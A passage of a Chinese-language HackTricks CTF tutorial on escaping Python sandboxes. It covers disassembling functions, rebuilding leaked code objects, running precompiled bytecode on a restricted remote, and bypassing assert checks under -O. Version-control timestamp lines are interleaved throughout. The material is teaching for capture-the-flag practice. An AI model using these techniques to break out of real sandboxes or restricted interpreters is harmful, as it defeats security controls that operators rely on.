'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'
```
2023-12-30 22:37:12 +00:00
### **反汇编一个函数**
2023-08-03 19:12:22 +00:00
```python
import dis
dis.dis(get_flag)
2 0 LOAD_CONST 1 (1)
3 STORE_FAST 1 (var1)
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
3 6 LOAD_CONST 2 ('secretcode')
9 STORE_FAST 2 (var2)
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
4 12 LOAD_CONST 3 ('some')
15 LOAD_CONST 4 ('array')
18 BUILD_LIST 2
21 STORE_FAST 3 (var3)
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
5 24 LOAD_FAST 0 (some_input)
27 LOAD_FAST 2 (var2)
30 COMPARE_OP 2 (==)
33 POP_JUMP_IF_FALSE 40
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
6 36 LOAD_CONST 5 ('THIS-IS-THE-FLAG!')
39 RETURN_VALUE
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
8 >> 40 LOAD_CONST 6 ('Nope')
43 RETURN_VALUE
44 LOAD_CONST 0 (None)
47 RETURN_VALUE
```
2024-03-09 13:16:16 +00:00
请注意, 如果您无法在Python沙箱中导入`dis`,您可以获取函数的**字节码**( `get_flag.func_code.co_code`),然后在本地**反汇编**它。您将无法看到加载的变量内容(`LOAD_CONST`),但可以从(`get_flag.func_code.co_consts`)中猜测它们,因为`LOAD_CONST`也会告诉您加载的变量的偏移量。
2020-07-15 15:43:14 +00:00
```python
dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S')
2023-08-03 19:12:22 +00:00
0 LOAD_CONST 1 (1)
3 STORE_FAST 1 (1)
6 LOAD_CONST 2 (2)
9 STORE_FAST 2 (2)
12 LOAD_CONST 3 (3)
15 LOAD_CONST 4 (4)
18 BUILD_LIST 2
21 STORE_FAST 3 (3)
24 LOAD_FAST 0 (0)
27 LOAD_FAST 2 (2)
30 COMPARE_OP 2 (==)
33 POP_JUMP_IF_FALSE 40
36 LOAD_CONST 5 (5)
39 RETURN_VALUE
>> 40 LOAD_CONST 6 (6)
43 RETURN_VALUE
44 LOAD_CONST 0 (0)
47 RETURN_VALUE
```
2024-03-09 13:16:16 +00:00
## 编译Python
2021-10-06 14:43:31 +00:00
2024-02-06 04:10:34 +00:00
现在,让我们想象一下,你可以**转储关于一个无法执行但你需要执行的函数的信息**。\
2024-03-09 13:16:16 +00:00
就像下面的例子中,你**可以访问该函数的代码对象**,但仅仅通过阅读反汇编,你**不知道如何计算标志**( _想象一个更复杂的`calc_flag`函数_) 。
2021-10-06 14:43:31 +00:00
```python
def get_flag(some_input):
2023-08-03 19:12:22 +00:00
var1=1
var2="secretcode"
var3=["some","array"]
def calc_flag(flag_rot2):
return ''.join(chr(ord(c)-2) for c in flag_rot2)
if some_input == var2:
return calc_flag("VjkuKuVjgHnci")
else:
return "Nope"
2021-10-06 14:43:31 +00:00
```
2023-08-03 19:12:22 +00:00
### 创建代码对象
2021-10-06 14:43:31 +00:00
2024-03-09 13:16:16 +00:00
首先,我们需要知道**如何创建和执行一个代码对象**,这样我们就可以创建一个来执行我们的函数 leaked:
2021-10-06 14:43:31 +00:00
```python
code_type = type((lambda: None).__code__)
2022-04-27 12:34:57 +00:00
# Check the following hint if you get an error in calling this
2021-10-06 14:43:31 +00:00
code_obj = code_type(co_argcount, co_kwonlyargcount,
2023-08-03 19:12:22 +00:00
co_nlocals, co_stacksize, co_flags,
co_code, co_consts, co_names,
co_varnames, co_filename, co_name,
co_firstlineno, co_lnotab, freevars=None,
cellvars=None)
2021-10-06 14:43:31 +00:00
# Execution
eval(code_obj) #Execute as a whole script
2022-05-01 12:41:36 +00:00
# If you have the code of a function, execute it
2021-10-06 14:43:31 +00:00
mydict = {}
mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
```
2022-04-27 12:34:57 +00:00
{% hint style="info" %}
2024-03-09 13:16:16 +00:00
根据 Python 版本,`code_type` 的 **参数** 可能有 **不同的顺序** 。了解你正在运行的 Python 版本中参数的顺序的最佳方法是运行:
2022-04-27 12:34:57 +00:00
```
import types
types.CodeType.__doc__
'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n flags, codestring, constants, names, varnames, filename, name,\n firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object. Not for the faint of heart.'
```
2024-02-06 04:10:34 +00:00
### 重新创建一个泄漏的函数
2021-10-06 14:43:31 +00:00
{% hint style="warning" %}
2024-02-06 04:10:34 +00:00
在下面的示例中,我们将直接从函数代码对象中获取重新创建函数所需的所有数据。在一个**真实的示例**中,执行函数**`code_type`**所需的所有**值**就是**您需要泄漏的内容**。
2021-10-06 14:43:31 +00:00
{% endhint %}
```python
fc = get_flag.__code__
2021-10-06 15:45:31 +00:00
# In a real situation the values like fc.co_argcount are the ones you need to leak
2021-10-06 14:43:31 +00:00
code_obj = code_type(fc.co_argcount, fc.co_kwonlyargcount, fc.co_nlocals, fc.co_stacksize, fc.co_flags, fc.co_code, fc.co_consts, fc.co_names, fc.co_varnames, fc.co_filename, fc.co_name, fc.co_firstlineno, fc.co_lnotab, cellvars=fc.co_cellvars, freevars=fc.co_freevars)
2021-10-06 15:45:31 +00:00
2021-10-06 14:43:31 +00:00
mydict = {}
mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
#ThisIsTheFlag
```
2023-12-30 22:37:12 +00:00
### 绕过防御
2021-10-06 14:43:31 +00:00
2024-02-06 04:10:34 +00:00
在本文开头的示例中,您可以看到如何使用`compile`函数执行任何Python代码。这很有趣, 因为您可以使用一行代码执行整个脚本( 我们也可以使用`exec`做同样的事情)。\
无论如何, 有时在本地机器上创建一个编译对象并在CTF机器上执行它可能很有用( 例如, 因为我们在CTF中没有`compile`函数)。
2021-10-06 14:43:31 +00:00
2024-03-09 13:16:16 +00:00
例如, 让我们手动编译和执行一个读取_./poc.py_文件的函数:
2021-10-06 14:43:31 +00:00
```python
#Locally
def read():
2023-08-03 19:12:22 +00:00
return open("./poc.py",'r').read()
2021-10-06 14:43:31 +00:00
read.__code__.co_code
't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'
```
```python
#On Remote
function_type = type(lambda: None)
code_type = type((lambda: None).__code__) #Get < type ' type ' >
consts = (None, "./poc.py", 'r')
bytecode = 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'
names = ('open','read')
# And execute it using eval/exec
eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '< module > ', 1, '', (), ()))
#You could also execute it directly
mydict = {}
mydict['__builtins__'] = __builtins__
codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '< module > ', 1, '', (), ())
function_type(codeobj, mydict, None, None, None)()
```
2024-03-09 13:16:16 +00:00
如果您无法访问 `eval` 或 `exec` ,您可以创建一个**适当的函数**, 但直接调用它通常会失败, 并显示: _constructor not accessible in restricted mode_。因此, 您需要一个**不在受限环境中的函数来调用此函数**。
2021-10-06 14:43:31 +00:00
```python
#Compile a regular print
ftype = type(lambda: None)
ctype = type((lambda: None).func_code)
f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {})
f(42)
```
2024-03-09 13:16:16 +00:00
## 反编译编译的 Python
2021-10-06 14:43:31 +00:00
2024-03-09 13:16:16 +00:00
使用类似 [**https://www.decompiler.com/** ](https://www.decompiler.com ) 的工具,可以对给定的编译后的 Python 代码进行**反编译**。
2021-12-24 01:52:37 +00:00
2024-03-09 13:16:16 +00:00
**查看这个教程**:
2021-12-24 01:52:37 +00:00
2022-05-01 16:04:05 +00:00
{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md ](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md )
2021-12-24 01:52:37 +00:00
{% endcontent-ref %}
2024-02-06 04:10:34 +00:00
## 杂项 Python
2021-12-24 01:52:37 +00:00
2024-02-06 04:10:34 +00:00
### 断言
2021-12-24 01:52:37 +00:00
2024-03-09 13:16:16 +00:00
使用参数 `-O` 对 Python 执行优化时,将删除断言语句和任何基于 **debug** 值的条件代码。\
2024-02-06 04:10:34 +00:00
因此,像
2021-12-24 01:52:37 +00:00
```python
def check_permission(super_user):
2023-08-03 19:12:22 +00:00
try:
assert(super_user)
print("\nYou are a super user\n")
except AssertionError:
print(f"\nNot a Super User!!!\n")
2021-12-24 01:52:37 +00:00
```
2023-08-03 19:12:22 +00:00
将被绕过
2021-12-24 01:52:37 +00:00
2023-08-03 19:12:22 +00:00
## 参考资料
2020-07-15 15:43:14 +00:00
* [https://lbarman.ch/blog/pyjail/ ](https://lbarman.ch/blog/pyjail/ )
* [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/ ](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/ )
* [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/ ](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/ )
2021-11-23 09:46:40 +00:00
* [https://gynvael.coldwind.pl/n/python\_sandbox\_escape ](https://gynvael.coldwind.pl/n/python\_sandbox\_escape )
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html ](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html )
2021-12-24 01:52:37 +00:00
* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6 ](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6 )
2022-04-28 16:01:33 +00:00
2023-09-03 01:34:43 +00:00
***
< details >
2022-08-31 22:35:39 +00:00
2024-03-09 13:16:16 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-12-30 22:37:12 +00:00
2024-02-06 04:10:34 +00:00
支持HackTricks的其他方式:
2022-08-31 22:35:39 +00:00
2024-03-09 13:16:16 +00:00
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2024-02-06 04:10:34 +00:00
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-03-09 13:16:16 +00:00
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-08-31 22:35:39 +00:00
2023-09-03 01:34:43 +00:00
< / details >